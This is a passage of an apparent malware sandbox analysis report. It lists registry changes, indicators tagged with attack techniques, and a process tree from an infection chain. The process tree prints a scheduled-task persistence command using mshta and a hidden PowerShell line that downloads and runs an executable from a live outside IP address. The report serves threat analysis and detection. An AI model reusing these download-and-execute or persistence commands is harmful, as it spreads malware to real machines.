Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
3528	timeout.exe
17328	timeout.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	342	Go-http-client/1.1

Kills process with taskkill 3 IoCs

defense_evasion

pid	Process
14116	taskkill.exe
7624	taskkill.exe
7892	taskkill.exe

Modifies registry class 31 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3446877943-4095308722-756223633-1000\{8C5DB0E4-1CAC-4732-97B9-3FDDAE7D7DA4}	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3446877943-4095308722-756223633-1000\{C6ABBDD1-2CBD-45B0-8607-C95DEAD2E178}	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2528	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6276	schtasks.exe
3304	schtasks.exe
5376	schtasks.exe
6800	SCHTASKS.exe
5152	schtasks.exe

Suspicious behavior: EnumeratesProcesses 55 IoCs

pid	Process
3196	powershell.exe
3196	powershell.exe
4732	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
4732	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
3572	rapes.exe
3572	rapes.exe
4336	a500e4f1ae.exe
4336	a500e4f1ae.exe
4336	a500e4f1ae.exe
4336	a500e4f1ae.exe
4336	a500e4f1ae.exe
4336	a500e4f1ae.exe
4336	a500e4f1ae.exe
4336	a500e4f1ae.exe
5368	JqGBbm7.exe
5368	JqGBbm7.exe
844	v6Oqdnc.exe
844	v6Oqdnc.exe
2960	powershell.exe
2960	powershell.exe
844	v6Oqdnc.exe
844	v6Oqdnc.exe
844	v6Oqdnc.exe
844	v6Oqdnc.exe
2396	Bthvgkck.exe
2396	Bthvgkck.exe
844	v6Oqdnc.exe
844	v6Oqdnc.exe
844	v6Oqdnc.exe
844	v6Oqdnc.exe
2396	Bthvgkck.exe
1644	HmngBpR.exe
1644	HmngBpR.exe
2684	SplashWin.exe
5800	SplashWin.exe
5800	SplashWin.exe
5800	SplashWin.exe
1964	powershell.exe
1964	powershell.exe
3076	cmd.exe
3076	cmd.exe
1868	rapes.exe
1868	rapes.exe
3160	s7MG2VL.exe
3160	s7MG2VL.exe
424	RegAsm.exe
424	RegAsm.exe
6728	cronikxqqq.exe
6728	cronikxqqq.exe
6728	cronikxqqq.exe
6728	cronikxqqq.exe
6728	cronikxqqq.exe
6728	cronikxqqq.exe
6728	cronikxqqq.exe
6728	cronikxqqq.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
5800	SplashWin.exe
3076	cmd.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeImpersonatePrivilege	4336	a500e4f1ae.exe
Token: SeImpersonatePrivilege	4336	a500e4f1ae.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeImpersonatePrivilege	844	v6Oqdnc.exe
Token: SeImpersonatePrivilege	844	v6Oqdnc.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	424	RegAsm.exe
Token: SeDebugPrivilege	6524	cronikxqqq.exe
Token: SeImpersonatePrivilege	6728	cronikxqqq.exe
Token: SeImpersonatePrivilege	6728	cronikxqqq.exe
Token: SeShutdownPrivilege	3524	explorer.exe
Token: SeCreatePagefilePrivilege	3524	explorer.exe
Token: SeShutdownPrivilege	3524	explorer.exe
Token: SeCreatePagefilePrivilege	3524	explorer.exe
Token: SeShutdownPrivilege	3524	explorer.exe
Token: SeCreatePagefilePrivilege	3524	explorer.exe
Token: SeShutdownPrivilege	3524	explorer.exe
Token: SeCreatePagefilePrivilege	3524	explorer.exe
Token: SeShutdownPrivilege	3524	explorer.exe
Token: SeCreatePagefilePrivilege	3524	explorer.exe
Token: SeShutdownPrivilege	3524	explorer.exe
Token: SeCreatePagefilePrivilege	3524	explorer.exe
Token: SeShutdownPrivilege	3524	explorer.exe
Token: SeCreatePagefilePrivilege	3524	explorer.exe
Token: SeShutdownPrivilege	3524	explorer.exe
Token: SeCreatePagefilePrivilege	3524	explorer.exe
Token: SeShutdownPrivilege	3524	explorer.exe
Token: SeCreatePagefilePrivilege	3524	explorer.exe
Token: SeShutdownPrivilege	6612	explorer.exe
Token: SeCreatePagefilePrivilege	6612	explorer.exe
Token: SeShutdownPrivilege	6612	explorer.exe
Token: SeCreatePagefilePrivilege	6612	explorer.exe
Token: SeShutdownPrivilege	6612	explorer.exe
Token: SeCreatePagefilePrivilege	6612	explorer.exe
Token: SeShutdownPrivilege	6612	explorer.exe
Token: SeCreatePagefilePrivilege	6612	explorer.exe
Token: SeShutdownPrivilege	6612	explorer.exe
Token: SeCreatePagefilePrivilege	6612	explorer.exe
Token: SeShutdownPrivilege	6612	explorer.exe
Token: SeCreatePagefilePrivilege	6612	explorer.exe
Token: SeShutdownPrivilege	6612	explorer.exe
Token: SeCreatePagefilePrivilege	6612	explorer.exe
Token: SeShutdownPrivilege	6612	explorer.exe
Token: SeCreatePagefilePrivilege	6612	explorer.exe
Token: SeDebugPrivilege	4736	ejrEdhQT0y.exe
Token: SeShutdownPrivilege	6612	explorer.exe
Token: SeCreatePagefilePrivilege	6612	explorer.exe

Suspicious use of FindShellTrayWindow 48 IoCs

pid	Process
2684	b90944a141.exe
2684	b90944a141.exe
2684	b90944a141.exe
4732	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
1220	zY9sqWs.exe
1724	sihost.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
2684	b90944a141.exe
2684	b90944a141.exe
2684	b90944a141.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
3524	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe
6612	explorer.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1644	HmngBpR.exe
5416	StartMenuExperienceHost.exe
3948	StartMenuExperienceHost.exe
5600	SearchApp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2684 wrote to memory of 1708	2684	b90944a141.exe	84
PID 2684 wrote to memory of 1708	2684	b90944a141.exe	84
PID 2684 wrote to memory of 1708	2684	b90944a141.exe	84
PID 2684 wrote to memory of 2524	2684	b90944a141.exe	85
PID 2684 wrote to memory of 2524	2684	b90944a141.exe	85
PID 2684 wrote to memory of 2524	2684	b90944a141.exe	85
PID 1708 wrote to memory of 5376	1708	cmd.exe	88
PID 1708 wrote to memory of 5376	1708	cmd.exe	88
PID 1708 wrote to memory of 5376	1708	cmd.exe	88
PID 2524 wrote to memory of 3196	2524	mshta.exe	91
PID 2524 wrote to memory of 3196	2524	mshta.exe	91
PID 2524 wrote to memory of 3196	2524	mshta.exe	91
PID 3196 wrote to memory of 4732	3196	powershell.exe	93
PID 3196 wrote to memory of 4732	3196	powershell.exe	93
PID 3196 wrote to memory of 4732	3196	powershell.exe	93
PID 4732 wrote to memory of 3572	4732	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE	94
PID 4732 wrote to memory of 3572	4732	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE	94
PID 4732 wrote to memory of 3572	4732	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE	94
PID 3572 wrote to memory of 2092	3572	rapes.exe	95
PID 3572 wrote to memory of 2092	3572	rapes.exe	95
PID 3572 wrote to memory of 2092	3572	rapes.exe	95
PID 2092 wrote to memory of 4336	2092	a500e4f1ae.exe	96
PID 2092 wrote to memory of 4336	2092	a500e4f1ae.exe	96
PID 2092 wrote to memory of 4336	2092	a500e4f1ae.exe	96
PID 2092 wrote to memory of 4336	2092	a500e4f1ae.exe	96
PID 2092 wrote to memory of 4336	2092	a500e4f1ae.exe	96
PID 2092 wrote to memory of 4336	2092	a500e4f1ae.exe	96
PID 2092 wrote to memory of 4336	2092	a500e4f1ae.exe	96
PID 2092 wrote to memory of 4336	2092	a500e4f1ae.exe	96
PID 2092 wrote to memory of 4336	2092	a500e4f1ae.exe	96
PID 3572 wrote to memory of 5368	3572	rapes.exe	98
PID 3572 wrote to memory of 5368	3572	rapes.exe	98
PID 3572 wrote to memory of 5368	3572	rapes.exe	98
PID 3572 wrote to memory of 1220	3572	rapes.exe	99
PID 3572 wrote to memory of 1220	3572	rapes.exe	99
PID 3572 wrote to memory of 1220	3572	rapes.exe	99
PID 1220 wrote to memory of 1916	1220	zY9sqWs.exe	100
PID 1220 wrote to memory of 1916	1220	zY9sqWs.exe	100
PID 1220 wrote to memory of 1916	1220	zY9sqWs.exe	100
PID 3572 wrote to memory of 844	3572	rapes.exe	101
PID 3572 wrote to memory of 844	3572	rapes.exe	101
PID 3572 wrote to memory of 844	3572	rapes.exe	101
PID 1916 wrote to memory of 2960	1916	Gxtuum.exe	102
PID 1916 wrote to memory of 2960	1916	Gxtuum.exe	102
PID 1916 wrote to memory of 2396	1916	Gxtuum.exe	105
PID 1916 wrote to memory of 2396	1916	Gxtuum.exe	105
PID 2396 wrote to memory of 2612	2396	Bthvgkck.exe	44
PID 3572 wrote to memory of 1644	3572	rapes.exe	107
PID 3572 wrote to memory of 1644	3572	rapes.exe	107
PID 1644 wrote to memory of 2684	1644	HmngBpR.exe	108
PID 1644 wrote to memory of 2684	1644	HmngBpR.exe	108
PID 1644 wrote to memory of 2684	1644	HmngBpR.exe	108
PID 2684 wrote to memory of 5800	2684	SplashWin.exe	109
PID 2684 wrote to memory of 5800	2684	SplashWin.exe	109
PID 2684 wrote to memory of 5800	2684	SplashWin.exe	109
PID 5800 wrote to memory of 3076	5800	SplashWin.exe	110
PID 5800 wrote to memory of 3076	5800	SplashWin.exe	110
PID 5800 wrote to memory of 3076	5800	SplashWin.exe	110
PID 3572 wrote to memory of 5908	3572	rapes.exe	112
PID 3572 wrote to memory of 5908	3572	rapes.exe	112
PID 5908 wrote to memory of 1964	5908	ADFoyxP.exe	113
PID 5908 wrote to memory of 1964	5908	ADFoyxP.exe	113
PID 5800 wrote to memory of 3076	5800	SplashWin.exe	110
PID 3572 wrote to memory of 2088	3572	rapes.exe	116

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:2612
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:424

C:\Users\Admin\AppData\Local\Temp\b90944a141.exe
"C:\Users\Admin\AppData\Local\Temp\b90944a141.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn wqJsBmas7E4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\XzIBGOsmp.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1708
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn wqJsBmas7E4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\XzIBGOsmp.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:5376
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\XzIBGOsmp.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3196
  - - C:\Users\Admin\AppData\Local\Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
      "C:\Users\Admin\AppData\Local\Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
